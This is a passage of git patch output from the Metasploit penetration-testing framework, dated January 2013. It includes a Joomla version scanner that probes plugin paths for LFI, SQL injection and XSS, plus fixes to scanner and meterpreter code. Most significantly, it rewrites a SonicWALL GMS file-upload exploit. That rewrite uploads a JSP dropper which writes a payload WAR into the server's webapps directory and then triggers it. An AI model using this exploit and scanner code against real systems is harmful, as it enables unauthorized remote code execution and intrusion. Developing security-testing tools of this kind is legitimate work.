=~ /^6/) ? "Joomla #{v}" : " #{v}" - elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or - response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or - response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) - out = "1.6" - elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) - out = "1.7" - elsif(response.body =~ /Joomla! 1.5/ or - response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) - out = "1.5" - elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or - response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) - out = "2.5" - elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/) - out = $1.split(/,/)[0] - elsif(response.body =~ /(Copyright \(C\) 2005 - 200(6|7))/ or - response.body =~/47 2005\-09\-15 02\:55\:27Z rhuk/ or response.body =~/423 2005\-10\-09 18\:23\:50Z stingrey/ or - response.body =~/1005 2005\-11\-13 17\:33\:59Z stingrey/ or response.body =~/1570 2005\-12\-29 05\:53\:33Z eddieajau/ or - response.body =~/2368 2006\-02\-14 17\:40\:02Z stingrey/ or response.body =~/4085 2006\-06\-21 16\:03\:54Z stingrey/ or - response.body =~/4756 2006\-08\-25 16\:07\:11Z stingrey/ or response.body =~/5973 2006\-12\-11 01\:26\:33Z robs/ or - response.body =~/5975 2006\-12\-11 01\:26\:33Z robs/) - out = "1.0" - else - out = 'Unknown Joomla' - end - return out - end - - def peer - return "#{rhost}:#{rport}" - end - - def run_host(ip) - tpath = normalize_uri(target_uri.path) - if tpath[-1,1] != '/' - tpath += '/' - end - apps = [ 'languaage/en-GB/en-GB.xml', - 'templates/system/css/system.css', - 'media/system/js/mootools-more.js', - 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', - 'index.php/component/users/?view=registration','htaccess.txt'] - vprint_status("#{peer} - Checking Joomla version") - apps.each do |app| - app_status = check_app(tpath, app, ip) - return if app_status == :abort - break if app_status - end - vprint_status("#{peer} - Checking for interesting pages") - iapps.each do |iapp| - scan_pages(tpath,iapp,ip) - end - if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking for interesting plugins") - bres = send_request_cgi({ - 'uri' => tpath, - 'method' => 'GET', - }, 5) - return if not bres or not bres.body or not bres.code - bres.body.gsub!(/[\r|\n]/, ' ') - File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| - papp = bapp.chomp - plugin_search(tpath,papp,ip,bres) - end - end - end - - def check_app(tpath, app, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << app, - 'method' => 'GET', - }) - return :abort if res.nil? - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - os = osfingerprint(res) - if (res.code == 200) - out = fingerprint(res) - return if not out - if(out =~ /Unknown Joomla/) - print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") - return false - else - print_good("#{peer} - Joomla Version:#{out} from: #{app} ") - print_good("#{peer} - OS: #{os}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Version', - :data => out - ) - return true - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def scan_pages(tpath, iapp, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << iapp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - if (res.code == 200) - if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "**Administrator Login Page" - elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) - sout = "**Registration Page" - else - sout = iapp - end - return if not sout - if(sout == iapp) - print_good("#{peer} - Page: #{tpath}#{iapp}") - elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Pages', - :data => sout - ) - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def plugin_search(tpath, papp, ip, bres) - res = send_request_cgi({ - 'uri' => "#{tpath}" << papp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - osize = bres.body.size - nsize = res.body.size - if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") - if (papp =~/passwd/ and res.body !~/root/) - vprint_error("#{peer} - Vulnerability: LFI not found") - elsif(papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") - elsif(papp =~/>alert/ and res.body !~/>alert/) - vprint_error("#{peer} - Vulnerability: No XSS") - elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") - elsif(res.body =~/SQL syntax/ ) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/com_/) - vars = papp.split('_') - pages = vars[1].gsub('/','') - res1 = send_request_cgi({ - 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", - 'method' => 'GET', - }, 5) - if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") - else - vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") - end - end - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Plugin Found', - :data => papp - ) - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} ip access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end - else - return - end - - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - - -end From 01b7e3554ee6575fd561d91789fd93ce5bdf089d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 22:05:09 +0100 Subject: [PATCH 171/421] fix issue found by newpid0 --- .../auxiliary/scanner/http/joomla_version.rb | 52 +++++++++---------- 1 file changed, 25 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 5ccdfe89d763..f0ebb7cbda68 100755 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -40,9 +40,7 @@ def os_fingerprint(response) end case response.headers['Server'] - when /Win32/ - when /\(Windows/ - when /IIS/ + when /Win32/, /\(Windows/, /IIS/ os = "Windows" when /Apache\// os = "*Nix" @@ -57,36 +55,36 @@ def fingerprint(response) when /<version.*\/?>(.+)<\/version\/?>/i v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" - when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ - when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ - when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ - when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ - when /20196 2011\-01\-09 02\:40\:25Z ian/ + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/, + /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/, + /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/, + /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/, + /20196 2011\-01\-09 02\:40\:25Z ian/ out = "1.6" - when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / - when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ - when /22183 2011\-09\-30 09\:04\:32Z infograf768/ - when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /, + /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/, + /22183 2011\-09\-30 09\:04\:32Z infograf768/, + /21660 2011\-06\-23 13\:25\:32Z infograf768/ out = "1.7" - when /Joomla! 1.5/ - when /MooTools\=\{version\:\'1\.12\'\}/ - when /11391 2009\-01\-04 13\:35\:50Z ian/ + when /Joomla! 1.5/, + /MooTools\=\{version\:\'1\.12\'\}/, + /11391 2009\-01\-04 13\:35\:50Z ian/ out = "1.5" - when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ - when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/, + /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ out = "2.5" when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/ out = $1.split(/,/)[0] - when /(Copyright \(C\) 2005 - 200(6|7))/ - when /47 2005\-09\-15 02\:55\:27Z rhuk/ - when /423 2005\-10\-09 18\:23\:50Z stingrey/ - when /1005 2005\-11\-13 17\:33\:59Z stingrey/ - when /1570 2005\-12\-29 05\:53\:33Z eddieajau/ - when /2368 2006\-02\-14 17\:40\:02Z stingrey/ - when /4085 2006\-06\-21 16\:03\:54Z stingrey/ - when /4756 2006\-08\-25 16\:07\:11Z stingrey/ - when /5973 2006\-12\-11 01\:26\:33Z robs/ - when /5975 2006\-12\-11 01\:26\:33Z robs/ + when /(Copyright \(C\) 2005 - 200(6|7))/, + /47 2005\-09\-15 02\:55\:27Z rhuk/, + /423 2005\-10\-09 18\:23\:50Z stingrey/, + /1005 2005\-11\-13 17\:33\:59Z stingrey/, + /1570 2005\-12\-29 05\:53\:33Z eddieajau/, + /2368 2006\-02\-14 17\:40\:02Z stingrey/, + /4085 2006\-06\-21 16\:03\:54Z stingrey/, + /4756 2006\-08\-25 16\:07\:11Z stingrey/, + /5973 2006\-12\-11 01\:26\:33Z robs/, + /5975 2006\-12\-11 01\:26\:33Z robs/ out = "1.0" else out = 'Unknown Joomla' From b4eed328a7d7d0cc821e226993529db80c6dcb7e Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Sat, 26 Jan 2013 01:26:18 -0500 Subject: [PATCH 172/421] MySQL login scanner unhandled exception --- modules/auxiliary/scanner/mysql/mysql_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index be8b70e14fc4..154c643877f7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -67,6 +67,7 @@ def mysql_version_check(target="5.0.67") # Oldest the library claims. end offset = 0 l0, l1, l2 = data[offset, 3].unpack('CCC') + return false if data.length < 3 length = l0 | (l1 << 8) | (l2 << 16) # Read a bad amount of data return if length != (data.length - 4) From 49aac302e6acf495dba9a024bd1ef13870080c84 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Sat, 26 Jan 2013 22:57:01 -0600 Subject: [PATCH 173/421] normalize_uri() breaks URI parsing Please see: http://dev.metasploit.com/redmine/issues/7727 --- modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 0895037634b6..d9c8e87e8dbc 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -80,7 +80,7 @@ def check def exploit peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) - uri << '/' if target_uri.path[-1,1] != '/' + uri << '/' if uri[-1,1] != '/' # Trigger the command execution bug res = send_request_cgi({ From 169f91159e00044dd7f475b5520682c3911371c6 Mon Sep 17 00:00:00 2001 From: rogueclown <rogueclown@rogueclown.net> Date: Sun, 27 Jan 2013 21:18:49 -0600 Subject: [PATCH 174/421] added 'from' PID to meterpreter migrate message --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cb6aca1ca6e3..8005b3b66d0c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -342,7 +342,8 @@ def cmd_migrate(*args) return end - print_status("Migrating to #{pid}...") + server = client.sys.process.open + print_status("Migrating from #{server.pid} to #{pid}...") # Do this thang. client.core.migrate(pid) From 3fc9b5d636a8ba4b326ab3c77ed5bb2e6f596120 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 00:01:45 -0600 Subject: [PATCH 175/421] Doc cleanup --- lib/msf/core/payload/java.rb | 6 ++-- lib/msf/util/exe.rb | 56 +++++++++++++++++++++++++----------- 2 files changed, 42 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 37e563e6eed6..824db13b0865 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -66,9 +66,9 @@ def generate_jar(opts={}) # Like #generate_jar, this method is used by stagers to create a war file # as a Rex::Zip::Jar object. # - # +opts+ can include: - # +:app_name+:: the name of the \<servlet-name> attribute in the web.xml. - # Defaults to "NAME" + # @param opts [Hash] + # @option :app_name [String] Name of the \<servlet-name> attribute in the + # web.xml. Defaults to random # def generate_war(opts={}) raise if not respond_to? :config diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 40f14ed747e9..33a41ca7c3a2 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -1,21 +1,13 @@ # -*- coding: binary -*- -## -# $Id: exe.rb 14286 2011-11-20 01:41:04Z rapid7 $ -## -### -# -# framework-util-exe -# -------------- +module Msf +module Util + # # The class provides methods for creating and encoding executable file # formats for various platforms. It is a replacement for the previous # code in Rex::Text # -### - -module Msf -module Util class EXE require 'rex' @@ -609,6 +601,7 @@ def self.to_osx_x64_macho(framework, code, opts={}) end # Create an ELF executable containing the payload provided in +code+ + # # For the default template, this method just appends the payload, checks if # the template is 32 or 64 bit and adjusts the offsets accordingly # For user-provided templates, modifies the header to mark all executable @@ -1187,8 +1180,9 @@ def self.to_win32pe_aspx(framework, code, opts={}) # Creates a jar file that drops the provided +exe+ into a random file name # in the system's temp dir and executes it. # - # See also: +Msf::Core::Payload::Java+ + # @see Msf::Payload::Java # + # @return [Rex::Zip::Jar] def self.to_jar(exe, opts={}) spawn = opts[:spawn] || 2 exe_name = Rex::Text.rand_text_alpha(8) + ".exe" @@ -1205,8 +1199,30 @@ def self.to_jar(exe, opts={}) zip end - # Creates a Web Archive (WAR) file from the provided jsp code. Additional options - # can be provided via the "opts" hash. + # Creates a Web Archive (WAR) file from the provided jsp code. + # + # On Tomcat, WAR files will be deployed into a directory with the same name + # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the + # server is in a default configuration, deoployment will happen + # automatically. See + # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat + # documentation} for a description of how this works. + # + # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ + # in the archive. This will be compiled by the victim servlet container + # (e.g., Tomcat) and act as the main function for the servlet. + # @param opts [Hash] + # @option opts :jsp_name [String] Name of the <jsp-file> in the archive + # _without the .jsp extension_. Defaults to random. + # @option opts :app_name [String] Name of the app to put in the <servlet-name> + # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to + # random. + # @option opts :extra_files [Array<String,String>] Additional files to add + # to the archive. First elment is filename, second is data + # + # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} + # + # @return [String] def self.to_war(jsp_raw, opts={}) jsp_name = opts[:jsp_name] jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) @@ -1247,9 +1263,15 @@ def self.to_war(jsp_raw, opts={}) return zip.pack end - # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload. - # The jsp page converts the hexdump back to a normal .exe file and places it in - # the temp directory. The payload .exe file is then executed. + # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a + # payload. The jsp page converts the hexdump back to a normal binary file + # and places it in the temp directory. The payload file is then executed. + # + # @see to_war + # @param exe [String] Executable to drop and run. + # @param opts (see to_war) + # @option opts (see to_war) + # @return (see to_war) def self.to_jsp_war(exe, opts={}) # begin <payload>.jsp From 044fefd02aab9117238b698bca48ec1b1f2f523d Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 00:02:26 -0600 Subject: [PATCH 176/421] Initial support for Java target Still some debugging junk, needs some more love. --- .../multi/http/sonicwall_gms_upload.rb | 168 +++++++----------- 1 file changed, 60 insertions(+), 108 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4abf1ce64523..175e676f4aaf 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,10 +5,13 @@ # http://metasploit.com/ ## +load 'lib/msf/core/payload/java.rb' +load 'lib/msf/core/encoded_payload.rb' +load 'lib/msf/util/exe.rb' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GoodRanking + Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -46,6 +49,12 @@ def initialize(info = {}) 'Platform' => [ 'win', 'linux' ], 'Targets' => [ + [ 'SonicWALL GMS 6.0 Viewpoint / Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + } + ], [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', { 'Arch' => ARCH_X86, @@ -70,82 +79,6 @@ def initialize(info = {}) end - def on_new_session - # on_new_session will force stdapi to load (for Linux meterpreter) - end - - - def generate_jsp - var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) - var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) - var_data = Rex::Text.rand_text_alpha(rand(8)+8) - var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) - var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) - var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) - var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) - var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) - var_counter = Rex::Text.rand_text_alpha(rand(8)+8) - var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) - var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) - var_comb = Rex::Text.rand_text_alpha(rand(8)+8) - var_exe = Rex::Text.rand_text_alpha(rand(8)+8) - @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) - var_proc = Rex::Text.rand_text_alpha(rand(8)+8) - var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) - var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) - - jspraw = "<%@ page import=\"java.io.*\" %>\n" - jspraw << "<%\n" - jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" - jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" - jspraw << "String #{var_data} = \"\";\n" - - jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" - jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" - jspraw << "}\n" - - jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" - jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" - - jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" - jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" - jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" - jspraw << "#{var_inputstream}.close();\n" - - jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" - jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" - jspraw << "{\n" - jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" - jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" - jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" - jspraw << "#{var_comb} <<= 4;\n" - jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" - jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" - jspraw << "}\n" - - jspraw << "#{var_outputstream}.write(#{var_bytes});\n" - jspraw << "#{var_outputstream}.close();\n" - - jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" - jspraw << "String[] #{var_fperm} = new String[3];\n" - jspraw << "#{var_fperm}[0] = \"chmod\";\n" - jspraw << "#{var_fperm}[1] = \"+x\";\n" - jspraw << "#{var_fperm}[2] = #{var_exepath};\n" - jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" - jspraw << "if (#{var_proc}.waitFor() == 0) {\n" - jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" - jspraw << "}\n" - # Linux and other UNICES allow removing files while they are in use... - jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" - jspraw << "} else {\n" - # Windows does not .. - jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" - jspraw << "}\n" - - jspraw << "%>\n" - return jspraw - end - def get_install_path res = send_request_cgi( { @@ -195,6 +128,11 @@ def upload_file(location, filename, contents) }, 'connection' => 'TE, close' }) + if target['Platform'] == "win" + register_files_for_cleanup("#{location}\\#{filename}") + else + register_files_for_cleanup("#{location}/#{filename}") + end if res and res.code == 200 and res.body.empty? return true @@ -236,44 +174,58 @@ def exploit @location = "#{install_path}webapps\\appliance\\" end + # Generate the WAR containing the EXE containing the payload + jsp_name = "index" + app_base = rand_text_alphanumeric(4+rand(32-4)) + + war = payload.encoded_war({ + :app_name => app_base, + :jsp_name => jsp_name, + :arch => target.arch, + :platform => target.platform + }).to_s + File.open("foo.war", "wb") { |fd| fd.write(war) } + + dropper = jsp_bin_dopper(war, "#{install_path}webapps/foo.war") + upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) + send_request_cgi( + { + 'uri' => normalize_uri("#{@uri}appliance/foo-dropper.jsp"), + 'method' => 'GET' + }) - # Upload the JSP and the raw payload - @jsp_name = rand_text_alphanumeric(8+rand(8)) - - jspraw = generate_jsp - - # Specify the payload in hex as an extra file.. - payload_hex = payload.encoded_exe.unpack('H*')[0] - - print_status("#{@peer} - Uploading the payload") + send_request_cgi( + { + 'uri' => normalize_uri("#{target_uri.path}/foo/#{app_base}/#{jsp_name}.jsp"), + 'method' => 'GET' + }) + end - if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) - print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") - else - fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") - end + def jsp_bin_dopper(bin_data, output_file) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| - print_status("#{@peer} - Uploading the payload") + jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| - if upload_file(@location, "#{@jsp_name}.jsp", jspraw) - print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") - else - fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") - end + jspraw << %Q|int numbytes = data.length();\n| - print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") - res = send_request_cgi( - { - 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", - 'method' => 'GET' - }) + jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| + jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| + jspraw << %Q|{\n| + jspraw << %Q| char char1 = (char) data.charAt(counter);\n| + jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| + jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| + jspraw << %Q| comb <<= 4;\n| + jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| + jspraw << %Q| bytes[counter/2] = (byte)comb;\n| + jspraw << %Q|}\n| - if res and res.code != 200 - print_warning("#{@peer} - Error triggering the payload") - end + jspraw << %Q|outputstream.write(bytes);\n| + jspraw << %Q|outputstream.close();\n| - register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") - register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + jspraw << %Q|%>\n| + return jspraw end end From fc833ea8df544a884712c7acc3620efdb6d993ba Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 10:30:59 -0600 Subject: [PATCH 177/421] Catch exceptions and return value --- .../meterpreter/ui/console/command_dispatcher/core.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 8005b3b66d0c..6d8fc9ae3a5d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -342,8 +342,15 @@ def cmd_migrate(*args) return end - server = client.sys.process.open - print_status("Migrating from #{server.pid} to #{pid}...") + begin + server = client.sys.process.open + rescue TimeoutError => e + elog(e.to_s) + rescue RequestError => e + elog(e.to_s) + end + + server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}") # Do this thang. client.core.migrate(pid) From 9a58b7b7320f57c25b97f9c6ac6748d2815d122b Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 12:10:21 -0600 Subject: [PATCH 178/421] Fix normalize_uri() function This will make sure all the double slashes are gone. Also, the function description is updated to clarify its purpose. --- lib/msf/core/exploit/http/client.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 